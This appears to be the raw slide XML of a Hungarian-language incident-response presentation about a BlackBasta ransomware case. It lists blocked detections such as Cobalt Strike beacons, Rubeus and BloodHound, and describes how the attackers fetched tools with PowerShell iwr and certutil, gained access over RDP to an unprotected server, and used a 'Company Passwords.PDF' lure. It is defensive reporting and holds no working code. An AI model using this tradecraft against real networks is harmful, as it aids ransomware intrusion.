              <a:t>Riskware.Rubeus.A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blokkolva az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ESET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LiveGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> által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/>
              <a:t>PowerShell Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WebRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> alias használata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/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Win64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CobaltStrike.Agent.B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/>
              <a:t>Certutil.exe</a:t>
            </a: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Win32/Rozena.SA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Explorer.exe (copy paste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> RDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-n keresztül</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/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Win64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kryptik.EEY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97E7884-3596-2551-5FAB-F819FC1B3B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817526" y="2348152"/>
            <a:ext cx="8914209" cy="703504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Használni kívánt eszközök „beszerzése”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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2260" y="0"/>
            <a:ext cx="189574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9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76E66-854A-1347-AB54-BF145051CE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Számos akciót blokkoltunk a 2 nap alatt</a:t>
            </a:r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830FF02-6F3F-852D-492F-AF3EF27E94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468432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1465009" y="3226117"/>
          <a:ext cx="6185745" cy="3834765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5225479">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4219308772"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="960266">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="39817151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Threat Name – Day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Count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206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Suspicious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82032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URL/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Urlik.AAF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7293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URL/Urlik.C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27495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URL/Urlik.E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94734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Win64/GenKryptik.GTKR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48157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Win64/Kryptik.EEY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1603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Win64/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Kryptik.EFH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6303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Renamed PowerShell Execution [D0411]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5366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124287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6A7DFF1-D527-20B3-FB99-040DEE4EC1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000177"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10478730" y="2198370"/>
          <a:ext cx="6198713" cy="7587615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5225479">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4219308772"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="973234">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="39817151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Threat Name – Day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Count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206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Hash blocked by ESET LiveGuard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82032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Generik.GXUDDTG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27991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MSIL/HackTool.SharpShares.A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51762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MSIL/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Riskware.BloodHound.D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3126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MSIL/Riskware.Rubeus.A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3620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Suspicious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03648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Win32/GenCBL.EQQ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89831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Win32/Rozena.SA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2728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Win64/CobaltStrike.Agent.B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70800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Win64/CobaltStrike.Artifact.Z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9564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Win64/CobaltStrike.Beacon.A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3609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Win64/GenKryptik.GTCZ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7293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Win64/GenKryptik.GTOS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27495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Win64/Kryptik.EEY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94734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Win64/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Kryptik.EFH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48157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Win64/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Kryptik.EFK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1603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Win64/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Kryptik.EFP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6303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Renamed PowerShell Execution [D0411]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7936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1242876"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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2260" y="0"/>
            <a:ext cx="189574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15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D7E34-6648-1922-3069-662674DB2A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5722" y="367758"/>
            <a:ext cx="11004308" cy="2271930"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Ha minden eszközüket blokkoltuk, akkor hogy futhatott le a zsarolókártevő?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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7D41F-A5B2-FFC4-0728-21FA0B2D99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9778" y="3464132"/>
            <a:ext cx="8734955" cy="1277686"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>Megnyitottak egy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> fájlt, aminek a neve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Company </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords.PDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”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738D9-8741-2083-2E3B-AF9C7E2D0E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4087" y="1062864"/>
            <a:ext cx="5783283" cy="86749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A11D37-CC68-93F3-4C9F-6BDE83B13F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0347" y="3336966"/>
            <a:ext cx="2063360" cy="20633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0F6782-1FB7-0127-898B-0B794E7B5F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5838" y="6025610"/>
            <a:ext cx="3104509" cy="2069673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2260" y="0"/>
            <a:ext cx="1895740" cy="543001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1468660" y="5338593"/>
            <a:ext cx="8537190" cy="1585049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marL="457200" lvl="0" indent="-457200" defTabSz="1371600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId7">
                  <a:extLst>
                    <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                      <asvg:svgBlip xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns="" xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId8"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fel lehetett csatlakozni egy nem védett szerverre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/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1468660" y="7197251"/>
            <a:ext cx="6107628" cy="646331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marL="457200" lvl="0" indent="-457200" defTabSz="1371600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId7">
                  <a:extLst>
                    <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                      <asvg:svgBlip xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns="" xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId9"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-re</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="25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76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43BAD-7FFC-9611-990C-E1C38A2BC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8791B-3B8F-2A2C-F69B-F28B8A4E14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300" y="30043"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial Access - RDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="freerdp_RDS_Notepad_sticky_04_mstscToSelf">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5D5723-32B4-408D-135E-150F717533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4949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06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09B2D-6E47-7FCA-A500-37D4C1E6B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E1A4461-3B1A-592C-D785-6084204A3380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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2E32515-7DBC-8CB4-57E7-16BB94D59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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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A5C8CEC-5792-DE2D-670B-924E129A410D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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336AE337-5237-5E39-41BD-FEBDA6D56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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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1669093-D8C0-6708-B5CD-82A2D7CBDB3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Graphic 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14F00981-EBE3-4B9A-4004-058233848F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79874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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5B8E373-7245-22EE-71FB-B775259A0927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2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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61A5B48-FFB5-A94E-6175-A0235D13F03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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905939F-2F6B-D461-5668-0FBCBBB528E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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0B7997BD-943B-18F6-7B64-E9FC2F2E3C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4857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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620927-2969-5E73-5CD3-3AB15746B711}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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831879E5-E85E-4711-1C9D-A38C80067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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C45736E2-E324-575F-CE1A-D3D6986015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285021" y="7772689"/>
            <a:ext cx="1049948" cy="1259938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AEDF5B16-D986-0052-48A3-4D9F359ACF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9987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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EC5E29A2-B8DF-F96A-A3ED-C1B0D0B7C057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481"/>
          </a:xfrm>
        </p:grpSpPr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DE3DAE9B-C260-1E1D-6F05-B6AE62A3F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6440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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43CA98FD-0885-25CB-A0D9-50C13130C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999429" y="8084811"/>
              <a:ext cx="464482" cy="5669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4FF4FA5-1651-42A4-9772-83A52A8AEA6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481"/>
          </a:xfrm>
        </p:grpSpPr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B930BC51-923B-41C7-ED26-75514CFC4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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="Graphic 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55CF2012-88D3-407C-3E1F-A56898EF0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8760513" y="8084811"/>
              <a:ext cx="464482" cy="56694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48AFD21-0894-178E-7200-1D35355FF127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="1101734"/>
          </a:xfrm>
        </p:grpSpPr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1EB867E2-2C72-55A8-E76F-7644F7865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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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E5A0AADD-9996-D993-A3FF-A33CFD8C86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2446684" y="7472873"/>
              <a:ext cx="464482" cy="56694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A43FAA1-3B19-4EA6-9126-BFC99B39D13E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734"/>
          </a:xfrm>
        </p:grpSpPr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93C3DC09-5A1D-8AB8-1294-A809E23F88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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="Graphic 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B19C64-F57F-86D7-D263-99BC7F900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4177312" y="6829940"/>
              <a:ext cx="464482" cy="566940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A106E53-A634-4384-BB02-3AFB24736385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="Graphic 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2676204-B238-E3C0-F2FB-236CCC879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>
              <a:off x="15055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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F98DA9F5-22F2-16BF-258A-974C12723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5533037" y="5407540"/>
              <a:ext cx="464482" cy="566940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E28356D-C916-0DBE-A9CA-F1328E0944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="Graphic 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A178CF-EDC2-30F4-0C43-B9F9F77A4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>
              <a:off x="13286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="Graphic 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68456E12-74EB-0A7D-91E6-2C1F05851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3778328" y="3922114"/>
              <a:ext cx="464482" cy="56694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46DA6D0-EA5C-7CD0-E402-7DEF1AE047D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Graphic 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A852461F-BA18-ECFF-BD0C-015BCA6566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>
              <a:off x="15421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="58" name="Graphic 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBEDD883-BD56-B8DE-049B-1100328C4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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Kép 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392260" y="-4801"/>
            <a:ext cx="189574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0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9.87654E-7 L 0.21892 -0.3106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46" y="-155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5A1C08-3CF0-9636-1093-D6539EADE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 descr="Shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D091C4-C156-1E39-7A07-10B727AAED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E96648-ED3A-F7FB-E4C1-DCB678DBE8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BlackBasta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Oh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>mit tettek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58B0688-AAEB-1289-1FFC-ADB73E3F46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72000" y="8784000"/>
            <a:ext cx="4103227" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/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4962" y="-1"/>
            <a:ext cx="1613038" cy="6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86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298EC-7E7E-EB22-AE96-C8E1B8BF4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B796C5C-221A-4751-3A85-B25D11114851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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87532DE-6B9A-0CD2-B4A5-7FC6FF3EE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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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2A7D65E-F1D0-A421-C1FF-1DCA37F010A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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810E68B4-B7A4-D999-1B61-ACB541218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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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E006394-4AD7-B325-7BD7-50F3BD1D01AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller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00FE168-EA4C-5112-170E-E891F46FE0F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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7AF77C4-184E-8539-1C63-52415E3F240D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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0393BAFF-C1BD-BBBE-F407-E1F479FE8D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4857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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0FE6667-B8A9-E827-8935-74C886DA91CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
